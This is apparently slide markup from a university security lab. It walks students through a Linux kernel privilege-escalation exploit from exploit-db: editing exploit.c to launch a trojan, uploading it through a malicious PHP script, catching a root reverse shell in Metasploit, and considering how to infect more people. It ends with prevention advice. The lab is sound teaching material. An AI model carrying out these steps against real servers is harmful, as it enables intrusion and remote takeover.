              <a:t>operating system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>software application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to gain elevated access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> that are normally protected from an application or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="361" name="Shape 36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53775" y="2608200"/>
            <a:ext cx="1487400" cy="196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turn now:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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 the cu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>rrent linux kernel version by typing the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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uname -a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> wherever you want.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Find an exploit in the current linux kernel version in the exploit-database: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https://www.exploit-db.com/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Answer: the following exploit seems to work :)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https://www.exploit-db.com/exploits/44298/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You can find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> code in the attacker machine.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turn now : Explanations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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311700" y="10555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Instead of running the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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trojan.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> directly using the malicious php script uploaded in the vulnerable web server, you will upload an executable C program (from exploit.c) modified in order to launch the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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trojan.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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exploit will allow you to execute the trojan as root and so get a remote root shell (see Schema next slide)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turn now: privilege shell difference</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="379" name="Shape 3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125" y="1069825"/>
            <a:ext cx="6950125" cy="3675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>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264975" y="19371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modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> code in order to match the diagram ?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Answer in the next slide</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Shape 38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Question</a:t>
            </a:r>
            <a:endParaRPr sz="36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turn now: modify the exploit.c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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the attacker machine open the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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exploit.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> file in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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scripts/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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first part of the code represents the buffer overflow, do not touch it.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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> function at the end of the code you will find a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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/>
              <a:t> command.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system command passes a command to the host environnement to be executed. In your case you don’t want the server to open a shell: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> but you want it to execute your trojan.py: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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python trojan.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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/>
              <a:t>Hint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> : in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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line_to_replace.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> you can find the answer.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turn now: Compile and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>upload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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 you modified exploit in the attacker machine: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" mar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gcc exploit.c -o exploit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Upload the executable to the vulnerable web server with basic upload.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Setup a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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multi/handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in a new msfconsole in order to wait for the vulnerable web server connection (see </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Listen for the victim connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> slide for configuration details).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Send ./exploit through you script.php evil script!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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="628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turn now - Congratulation!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="403" name="Shape 4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175" y="602950"/>
            <a:ext cx="5214501" cy="44740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404" name="Shape 404"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819175" y="636225"/>
            <a:ext cx="2002200" cy="173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Shape 405"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1768175" y="4729400"/>
            <a:ext cx="491100" cy="213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/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264975" y="1739900"/>
            <a:ext cx="4045200" cy="13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u="sng"/>
              <a:t>Open question</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: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Imagine a way to infect more people thanks to your rooted vulnerable web server.</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Shape 41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Question</a:t>
            </a:r>
            <a:endParaRPr sz="36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How to prevent this kind of attack</a:t>
            </a:r>
            <a:endParaRPr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Attack demonstration</a:t>
            </a:r>
            <a:endParaRPr sz="36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prevent this kind of attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Shape 422"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1502375"/>
            <a:ext cx="8520600" cy="20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 if this kind of attack is still possible on some website, most frameworks are not vulnerable anymore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the Malicious File Execution remains a classic you have to know !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prevent this kind of attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Shape 4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3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Restrict file extension and disable multiple extension files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="113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Strip the METADATA off</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="113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Prevent code from being executed where the image is uploaded</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="113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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>with basic functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> if the uploaded file is what you wanted (getimagesize for instance)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="113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Configure firewall so even issued requests are checked 					(to prevent reverse shell)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="113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Include files without using URL direclty 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Congratulation for your work !</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Shape 434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H4413 - TP SERE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="435" name="Shape 4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8253" y="4652875"/>
            <a:ext cx="496426" cy="32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Shape 436"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="44861" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7390201" y="4652875"/>
            <a:ext cx="829373" cy="3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configuration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Ping like a boss!</a:t>
            </a:r>
            <a:endParaRPr/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Ping the web server with the attacker machine: </a:t>
            </a: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ping -c 5 10.0.0.20</a:t>
            </a:r>
            <a:endParaRPr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9700" y="1957400"/>
            <a:ext cx="6124575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 server ready ?</a:t>
            </a:r>
            <a:endParaRPr/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Open firefox browser on the attacker machine and go to </a:t>
            </a:r>
            <a:r>
              <a:rPr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http://10.0.0.20/index.html</a:t>
            </a:r>
            <a:endParaRPr/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0049" y="2022575"/>
            <a:ext cx="3734974" cy="27501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file upload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